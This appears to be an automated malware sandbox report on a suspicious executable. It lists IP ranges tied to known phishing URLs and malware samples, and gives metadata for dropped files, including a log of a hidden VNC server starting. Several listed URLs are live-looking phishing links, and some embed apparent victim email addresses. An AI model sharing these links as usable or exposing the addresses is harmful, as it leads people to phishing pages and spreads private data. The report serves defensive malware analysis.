                                                    https://clickeuc1.actmkt.com//s/052-0d3f28ba-446f-45fc-aaa8-4c1728edb7be?enr=naahiaduabyaa4yahiac6abpabsqa4qaneaggadbaa2aanaafyadaabqaayaa5yamuageadiabxqa4yaoqagcadqabyaalqammag6adnaaxqa3yao4agcadbaaxqa7aamqagyadbabzaa5iamuadkabuaayqaqaam4ag2adbabuqa3aafyaggadpabwqa7aagaahyad4aayaaniagiac2abqabsaamyamyadeabyabraayiafuadiabuaa3aazqafuadiabvabtaayyafuagcadbabqqaoaafuadiaddaayqanyagiadqadfabsaayqag4ageadfab6aamaaguadsabnabtaaoiagmagiabqabtaamiagqac2abtaa2qaziamyac2abuabsqaoiamuac2abzaa2aazqagqac2abraayqamyamyadoabvaa3aazaamqadsabrabqqa7aagaadaabraawqazqaguadaabrabtaazaagmadcabnaa4qanyageadqabnaa2aaniaheadoabnaa4qamyamuadeabnaa3aanqamyaggabwabtaayqamuagiadgaazqamiapqahyacbab6aa===#Y2lyby5zb2FyZXNAbm92b2JhbmNvLnB0&xcpShlRGet hashmaliciousHTMLPhisherBrowse
                                                    • 192.229.173.207
                                                    http://mailing-stats.clubview.co.uk/ls/click?upn=JGTDuCHFcCqat3Th7oew44Ossg-2F2NTVg-2BtYj7w1DoMH5YmBe3nFFnuJtHf-2BnYwqFV20JUmqqJfg-2FmMpr4r23ZokFQC7mKC3gGQrz9PVyBwY-3DgP2X_ycFUGOmj-2BzZRMCTo5aRQsS6Jkwa-2Bnfox4zR-2BIEsEWER5kKFE9-2B6WqMFMwjupMYIg47qAuiflHf29TpR-2Bi-2F2mpiCBhllU0f8DN7APb4-2BqWtgh6hvaMQpGLpKUcO0SpRuVoG1yfmXGgWnDxA6cKh7QHvB7k0W6xAQXsN1TOZ8sQxZocfk0XSJvtCZMWElpBVjmRa374HG9YdZqMioBmLh3gF0KvEd5YaRKrqX-2FZlEGidk-3DGet hashmaliciousUnknownBrowse
                                                    • 152.195.19.97
                                                    file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                    • 152.195.19.97
                                                    Bank_Verification_Form.htmlGet hashmaliciousUnknownBrowse
                                                    • 152.199.4.33
                                                    https://link.mail.beehiiv.com/ss/c/PueTBZLlh8npO1epiTd7L1qK7CpRRWYkaLDcsmBux7Yam39KuLLNtl2CtcuJF0W6nDvOaHFjuVJqpI778hwLFcCSp0xP9lBQd1QwXw9sjsZpVYGzcacqb2r93Fs_qwmI5Crcdaw4hELdJtUMeK51Pw/436/YGLbNQWXRWqqEnC5oYBqNw/h6/WcxpuAi4FcomQTdzggxEu522j_jrrOITkmIHaWx4Wxc#/?email=kim.ansell@proampac.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 152.195.19.97
                                                    OARNET-ASUS8iolWfLe1f.elfGet hashmaliciousUnknownBrowse
                                                    • 130.110.238.104
                                                    2XcXiCaqz1.elfGet hashmaliciousMiraiBrowse
                                                    • 206.244.62.50
                                                    huhu.arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 138.30.225.135
                                                    Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                    • 140.228.29.110
                                                    Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                    • 140.228.29.110
                                                    huhu.arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 157.134.214.94
                                                    skyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 136.227.248.206
                                                    ZMuJrxk7ff.elfGet hashmaliciousUnknownBrowse
                                                    • 140.229.52.187
                                                    skyljne.x86.elfGet hashmaliciousMiraiBrowse
                                                    • 140.222.172.141
                                                    AMAZON-AESUShttps://action.azurecomm.net/api/a/c?r=AIAACQJ7N3RHRZX6IZM33IBYQ4MNDYSKJPZHFK44PSWHNQ6FEVHFP2RA3BSNZVTHGF6HKUB6O2LBGSRHI3FY3KAKX3EKHPYOCU7YEFYYN4AR7S324Y5XUXYFZRZDPPRQPH6WDT4WNFNQ454B76IIVAHFGIDS7DQ&d=AIAADB5AXS66X5S3O3K4JZUUU6B4GB2NGCAUGZLVANYHV7ATW4L67VZGBIG34MI4XYO55VPP7DJOHMIEFUYCBIVG2ZYW7S5DJRPBJFVECG6FJB2GVAVFPB4WLTSBYQS6PDH2HY5T6YX4YWFXUNUDCAMATEP4EKF4ISUQN6OXSAR3SMFWYDBXU4QRJ2DR3UNTY7PL434LB3FIJPEQUQXKM6KHE4CVIMY6DNB2JNBKCBHG6VWPIUZUMYM42HH4CRRQMCQSV2QU5H7N4HFIMOFCDCAGDQZYFVA&url=yygpKSi20tdPTi1KLElNzkjOTyzJzEsvzq7K00vO16tK1E8uKNYHAA==Get hashmaliciousUnknownBrowse
                                                    • 34.193.113.164
                                                    http://timelessbeautylessons.comGet hashmaliciousUnknownBrowse
                                                    • 18.210.229.244
                                                    https://spectrumpaint.atlassian.net/wiki/external/ZTZiNjUxYzcwM2FjNGI0OGE1NWMwMzVkMmYwMDBlYmMGet hashmaliciousHTMLPhisherBrowse
                                                    • 52.205.158.56
                                                    https://firebasestorage.googleapis.com/v0/b/zimbra-e4109.appspot.com/o/index.html?alt=media&token=82649150-32e4-4926-b715-5c594db085eaGet hashmaliciousUnknownBrowse
                                                    • 18.208.125.13
                                                    https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=Get hashmaliciousHTMLPhisherBrowse
                                                    • 44.197.233.190
                                                    Poste officielGet hashmaliciousUnknownBrowse
                                                    • 3.224.184.191
                                                    file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                    • 35.171.113.32
                                                    http://ad735.esGet hashmaliciousUnknownBrowse
                                                    • 54.89.32.163
                                                    https://rayvehiclesandrepair.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                                                    • 52.2.170.208
                                                    file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                    • 18.215.61.248
                                                    AKAMAI-ASUShttp://timelessbeautylessons.comGet hashmaliciousUnknownBrowse
                                                    • 96.17.33.186
                                                    Payment proof.emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 23.50.120.157
                                                    0IY4t0eqn2.exeGet hashmaliciousDarkTortilla, RedLineBrowse
                                                    • 23.54.200.159
                                                    SecuriteInfo.com.Trojan-Spy.AgentTesla.19330.30734.exeGet hashmaliciousUnknownBrowse
                                                    • 184.30.122.172
                                                    SecuriteInfo.com.Trojan-Spy.AgentTesla.19330.30734.exeGet hashmaliciousUnknownBrowse
                                                    • 184.30.122.172
                                                    qRNGy553ii.exeGet hashmaliciousUnknownBrowse
                                                    • 104.84.231.73
                                                    5BC5gMj9mA.elfGet hashmaliciousUnknownBrowse
                                                    • 84.53.135.134
                                                    F0fDzieAG4.elfGet hashmaliciousMiraiBrowse
                                                    • 184.30.64.206
                                                    java.exeGet hashmaliciousTinbaBrowse
                                                    • 173.222.162.32
                                                    python.exeGet hashmaliciousCobaltStrikeBrowse
                                                    • 23.54.200.159
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Local\Temp\MSI6FDC.tmpFatturation110124.exeGet hashmaliciousUnknownBrowse
                                                      Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                        Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                          1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                                            1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                                              Setup.msiGet hashmaliciousUnknownBrowse
                                                                C:\Users\user\AppData\Local\Temp\MSI6F00.tmpFatturation110124.exeGet hashmaliciousUnknownBrowse
                                                                  Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                                    Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                                      1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                                                        1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):10
                                                                            Entropy (8bit):2.9219280948873623
                                                                            Encrypted:false
                                                                            SSDEEP:3:DdWcw:Bbw
                                                                            MD5:EF303119CD5A401423EFE69D77275604
                                                                            SHA1:0D2534C78AE7A1FD9CC5FF0DDED77800B171F787
                                                                            SHA-256:F1A65F2D0644D187AFD37F75EDC06E25D412C3A6218619A39101C2A5CDCB61EA
                                                                            SHA-512:CAA5CA40AEAD79316B20A3F6977B255D2677F7472642579D405A945137E3B7F9661C655510D6A6761E046910335E3953C40BF3AD77671EAF237895A7B03F718C
                                                                            Malicious:false
                                                                            Preview:5383948 ..
                                                                            Process:C:\Games\taskhost.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1421
                                                                            Entropy (8bit):4.919536877398004
                                                                            Encrypted:false
                                                                            SSDEEP:24:y38ApvI/dg3KtcJaAwp+Sjh31Nemb31NemnGRyQEgshgOZbHNDuwOZxD//P33k34:y3LFI/dg3XJaAwp+Sj7txtG8kshgMb5i
                                                                            MD5:6EF42238183882749CCFD368788B3A3C
                                                                            SHA1:E33154329DD1916C0F605B115F0BE7A77BFF6EA7
                                                                            SHA-256:DF25EFF50326E1DDF0A3489EA946A392902E6207ECA623E88A7BF4456BDF78B0
                                                                            SHA-512:632DA8709411633142BF496AD76E4DC833FD5D41DA903CC27A15E2D00F5D03403E0BD81BC150FEC000B560DC78E472DCC2276F207957629D90B8EEDE8CA67675
                                                                            Malicious:false
                                                                            Preview:Tue Jan 23 12:18:21 2024.WinVNCAppMain : WinVNCAPPMain-----Application started.WinVNCAppMain : server created ok.imp_desktop_thread : OpenInputdesktop OK.imp_desktop_thread : SelectHDESK to Default (370) from 11c.imp_desktop_thread : Username user .vncMenu::vncMenu : vncmenu(server).Tue Jan 23 12:18:22 2024.vncServer::SetAuthHosts : authhosts cleared.vncServer::EnableConnections : SockConnect 0.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : trying port number 5900.Tue Jan 23 12:18:24 2024.VSocket::Close : closing socket.vncServer::EnableConnections : SockConnect Done 1.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : SockConnect 1.vncSockConnectThread::run_undetached : started socket connection thread.vncHTTPConnectThread::run_undetached : started HTTP server thread.imp_desktop_thread : PostAddNewClient IIIII.Tue Jan 23 12:18:25 2024.vncServer::AutoConnectRetry : AutoConnectRetry(): started.vncServer::actualRetryThread : Attempt
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):292
                                                                            Entropy (8bit):5.252775680408843
                                                                            Encrypted:false
                                                                            SSDEEP:6:HMWpPUM8Q+q2Pwkn2nKuAl9OmbnIFUt8+MWpPUMmbQgZmw++MWpPUMm8uDQdSQVW:H5PP8VvYfHAahFUt8+5PPOQg/++5PP1w
                                                                            MD5:60425B4FF8C1C1A6F2D0092A7F15EF6F
                                                                            SHA1:662F7165E9DCE1C85B5F6C60853F13E5E9658325
                                                                            SHA-256:9D98E231F4FBCA538ACE193C53EF5A47A733EECB05FA83DA1A009FE2E61B52AC
                                                                            SHA-512:CCCC61F24A9C032BBE9A5A44286BF8FBB8FF5077C367AC9B89636408F56BEEF62B7D3F92C8209757EFD7753B617F6AECAC6CAC5681B25990F686B416510BF88F
                                                                            Malicious:false
                                                                            Preview:2024/01/23-12:18:09.699 1f58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:18:09.702 1f58 Recovering log #3.2024/01/23-12:18:09.703 1f58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):292
                                                                            Entropy (8bit):5.252775680408843
                                                                            Encrypted:false
                                                                            SSDEEP:6:HMWpPUM8Q+q2Pwkn2nKuAl9OmbnIFUt8+MWpPUMmbQgZmw++MWpPUMm8uDQdSQVW:H5PP8VvYfHAahFUt8+5PPOQg/++5PP1w
                                                                            MD5:60425B4FF8C1C1A6F2D0092A7F15EF6F
                                                                            SHA1:662F7165E9DCE1C85B5F6C60853F13E5E9658325
                                                                            SHA-256:9D98E231F4FBCA538ACE193C53EF5A47A733EECB05FA83DA1A009FE2E61B52AC
                                                                            SHA-512:CCCC61F24A9C032BBE9A5A44286BF8FBB8FF5077C367AC9B89636408F56BEEF62B7D3F92C8209757EFD7753B617F6AECAC6CAC5681B25990F686B416510BF88F
                                                                            Malicious:false
                                                                            Preview:2024/01/23-12:18:09.699 1f58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:18:09.702 1f58 Recovering log #3.2024/01/23-12:18:09.703 1f58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):336
                                                                            Entropy (8bit):5.19553724333011
                                                                            Encrypted:false
                                                                            SSDEEP:6:HMWpPUMmQuH0jyq2Pwkn2nKuAl9Ombzo2jMGIFUt8+MWpPUMmSc511Zmw++MWpP1:H5PPVI0jyvYfHAa8uFUt8+5PPlcV/++b
                                                                            MD5:6111CAE82E5ED6DFB2D5ED0321FCFE6D
                                                                            SHA1:4B71E616B9216D8A038A54202BF10E48364A432B
                                                                            SHA-256:C8FF27F73BEDF7198BD15020DA2A6438AED615B40654BAE2E84D64DDAB4E1A46
                                                                            SHA-512:410B42C40DE1177727C5E5677BEFCCBAEA254F92EAC133A6167D99A61FA850C0A27B85F49B9B483F8CF7C2052CB26DB4EFDABAA21DF28DE986A12988B09836AB
                                                                            Malicious:false
                                                                            Preview:2024/01/23-12:18:09.769 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:18:09.771 1be4 Recovering log #3.2024/01/23-12:18:09.771 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):336
                                                                            Entropy (8bit):5.19553724333011
                                                                            Encrypted:false
                                                                            SSDEEP:6:HMWpPUMmQuH0jyq2Pwkn2nKuAl9Ombzo2jMGIFUt8+MWpPUMmSc511Zmw++MWpP1:H5PPVI0jyvYfHAa8uFUt8+5PPlcV/++b
                                                                            MD5:6111CAE82E5ED6DFB2D5ED0321FCFE6D
                                                                            SHA1:4B71E616B9216D8A038A54202BF10E48364A432B
                                                                            SHA-256:C8FF27F73BEDF7198BD15020DA2A6438AED615B40654BAE2E84D64DDAB4E1A46
                                                                            SHA-512:410B42C40DE1177727C5E5677BEFCCBAEA254F92EAC133A6167D99A61FA850C0A27B85F49B9B483F8CF7C2052CB26DB4EFDABAA21DF28DE986A12988B09836AB
                                                                            Malicious:false
                                                                            Preview:2024/01/23-12:18:09.769 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:18:09.771 1be4 Recovering log #3.2024/01/23-12:18:09.771 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:JSON data
                                                                            Category:modified
                                                                            Size (bytes):475
                                                                            Entropy (8bit):4.9650414169567965
                                                                            Encrypted:false
                                                                            SSDEEP:12:YH/um3RA8sqZQiysBdOg2H4caq3QYiubInP7E4T3y:Y2sRdsC3dMHz3QYhbG7nby
                                                                            MD5:DB44F690ED46A9B57D69DF5164126886
                                                                            SHA1:E7E352F6B3C35C5355DC9FC134506E2261894692
                                                                            SHA-256:C67D0B042F36E540543294FDA5079CE6726D68234D1EE935CB4DC0FDEF5E29CA
                                                                            SHA-512:918E36E5170CC2B5FFB905161A9C89E2FC25E42AF3BA7425B2D71A5D35F648437B5B1AF7067DF6F8EACA2C921D388CBD7FFDD5F70B382992DF8C9C9E3C551912
                                                                            Malicious:false
                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568701451515","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119225},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):475
                                                                            Entropy (8bit):4.9650414169567965
                                                                            Encrypted:false
                                                                            SSDEEP:12:YH/um3RA8sqZQiysBdOg2H4caq3QYiubInP7E4T3y:Y2sRdsC3dMHz3QYhbG7nby
                                                                            MD5:DB44F690ED46A9B57D69DF5164126886
                                                                            SHA1:E7E352F6B3C35C5355DC9FC134506E2261894692
                                                                            SHA-256:C67D0B042F36E540543294FDA5079CE6726D68234D1EE935CB4DC0FDEF5E29CA
                                                                            SHA-512:918E36E5170CC2B5FFB905161A9C89E2FC25E42AF3BA7425B2D71A5D35F648437B5B1AF7067DF6F8EACA2C921D388CBD7FFDD5F70B382992DF8C9C9E3C551912
                                                                            Malicious:false
                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568701451515","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119225},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4320
                                                                            Entropy (8bit):5.256625461075982
                                                                            Encrypted:false
                                                                            SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7bYLrG/y:etJCV4FiN/jTN/2r8Mta02fEhgO73gos
                                                                            MD5:94220663132224431A0735E6DC62D8D9
                                                                            SHA1:A20AAFC67813BBCA896816A65D1796516A549965
                                                                            SHA-256:9B0DE5074BE034AEEA10A3F651C0F988324F1658E88875A6278269941CF514EB
                                                                            SHA-512:E59336BA9AD339BF3AFF78BF4E972B00EA895D6DFCA0C72C9EA57B24D48196EAB5067616231EE685B7D3F1C75248ED0C4375AD8E5B0A9EACF5E39865E20078E3
                                                                            Malicious:false
                                                                            Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):324
                                                                            Entropy (8bit):5.109846479746542
                                                                            Encrypted:false
                                                                            SSDEEP:6:HMWpPUWjyq2Pwkn2nKuAl9OmbzNMxIFUt8+MWpPUF9/1Zmw++MWpPU1gpRkwOwkS:H5PLjyvYfHAa8jFUt8+5Pq99/++5PZpB
                                                                            MD5:99BEB36717C7BB72FB92C972D6CAEDE4
                                                                            SHA1:3D1C7AE05C174CB56E5CFB9777BC423B5F4B5624
                                                                            SHA-256:A4C7C92192C2F79B3ADD9F5730CF910D3F4E8DE7E983420572A723042307B9C8
                                                                            SHA-512:25EB2C695E9FB29BCAF56058EC3E21A04F6470D34193C84DAF0C1EA939A2B5FF361EBCFA39B7E75D12CB3414C33BC1F1F480245E0668D327916C614F79558F44
                                                                            Malicious:false
                                                                            Preview:2024/01/23-12:18:10.101 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:18:10.104 1be4 Recovering log #3.2024/01/23-12:18:10.105 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):324
                                                                            Entropy (8bit):5.109846479746542
                                                                            Encrypted:false
                                                                            SSDEEP:6:HMWpPUWjyq2Pwkn2nKuAl9OmbzNMxIFUt8+MWpPUF9/1Zmw++MWpPU1gpRkwOwkS:H5PLjyvYfHAa8jFUt8+5Pq99/++5PZpB
                                                                            MD5:99BEB36717C7BB72FB92C972D6CAEDE4
                                                                            SHA1:3D1C7AE05C174CB56E5CFB9777BC423B5F4B5624
                                                                            SHA-256:A4C7C92192C2F79B3ADD9F5730CF910D3F4E8DE7E983420572A723042307B9C8
                                                                            SHA-512:25EB2C695E9FB29BCAF56058EC3E21A04F6470D34193C84DAF0C1EA939A2B5FF361EBCFA39B7E75D12CB3414C33BC1F1F480245E0668D327916C614F79558F44
                                                                            Malicious:false
                                                                            Preview:2024/01/23-12:18:10.101 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:18:10.104 1be4 Recovering log #3.2024/01/23-12:18:10.105 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                            Category:dropped
                                                                            Size (bytes):86016
                                                                            Entropy (8bit):4.444965548209977
                                                                            Encrypted:false
                                                                            SSDEEP:384:yezci5tciBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r7s3OazzU89UTTgUL
                                                                            MD5:F3D03763B49598DBAD45643FF5B9548C
                                                                            SHA1:8DB0B1C6C2AF2D7DAE7B96394E992152C9EB1ECC
                                                                            SHA-256:E75B7D24B58CCF162BBD5E2353FB8538226A057239CA98F8BFE488FDAF0432BE
                                                                            SHA-512:D0E870D59182C5A09313490AA9EA07E43416BAEE2F2BD9D39E4B244761B25FD8869E5560529E2432525F7FE0B113E4798B5A1B76B5F541F4876CFACA163BBEFB
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:SQLite Rollback Journal
                                                                            Category:dropped
                                                                            Size (bytes):8720
                                                                            Entropy (8bit):3.775195806422905
                                                                            Encrypted:false
                                                                            SSDEEP:48:7M4Dp/E2ioyVmioy9oWoy1Cwoy1yKOioy1noy1AYoy1Wioy1hioybioyEoy1noy+:7DDpjumFJXKQpBWb9IVXEBodRBkZ
                                                                            MD5:F4A34F8B68409CDAC14B3E7E86D35C74
                                                                            SHA1:A88C78C32487317F1CABF717102232DF47A71320
                                                                            SHA-256:6A44DA9F4C3E639DCC7656ECE568E8D3E371B6CD010F69D9D4B1F0F3A2F1B2F0
                                                                            SHA-512:320A379E05DB9CE1634014891DEF5A39DBFD4D60194E0265BA2887562FA04BFAEF65BB48B0A86771F3EF9A33AB3CE9B0EB288FAEADA992EC851F9FA8DEB30BBA
                                                                            Malicious:false
                                                                            Preview:.... .c.......U................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                            Category:dropped
                                                                            Size (bytes):66791
                                                                            Entropy (8bit):7.995531727155867
                                                                            Encrypted:true
                                                                            SSDEEP:1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
                                                                            MD5:AC05D27423A85ADC1622C714F2CB6184
                                                                            SHA1:B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
                                                                            SHA-256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
                                                                            SHA-512:6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
                                                                            Malicious:false
                                                                            Preview:MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ*..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..*Q..._<.S....{a.=.n...PT.Um).| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):330
                                                                            Entropy (8bit):3.1308583258674845
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKtIHesurN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:iHNPkPlE99SNxAhUeWcC
                                                                            MD5:345D1F3907A46A8C8C8F1F625ACADB22
                                                                            SHA1:9208172DBA451DC3B503E8DCB16E47A42D73F935
                                                                            SHA-256:FECB11CC085BD55C400F7DEF826DA5443366D4F557F510C059AC1426BF4EE47C
                                                                            SHA-512:A1641CC0EAC173419E1C773A6C7AAFADF4CFBC4B87870AD56F3EA08C4845708F07E13CED231619D69142F8197966F83D308BC15FBE136A3DCB698E40A1EF7DCC
                                                                            Malicious:false
                                                                            Preview:p...... .............M..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:PostScript document text
                                                                            Category:dropped
                                                                            Size (bytes):1233
